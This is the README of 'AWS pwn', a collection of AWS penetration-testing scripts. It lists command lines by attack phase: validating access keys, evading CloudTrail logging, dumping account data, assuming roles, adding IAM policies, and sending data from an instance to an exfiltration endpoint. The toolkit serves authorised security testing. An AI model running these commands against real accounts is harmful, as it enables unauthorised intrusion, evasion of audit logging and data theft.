Home

Awesome

AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

./dump_instance_attributes.py -u -o /tmp/
./dump_cloudformation_stack_descriptions.py -o /tmp/data
./assume_roles.py -o /tmp/out.json
./add_iam_policy.py -u myuser -r myrole -g mygroup
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an acccount.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either to stupid or too lazy to classify.

To do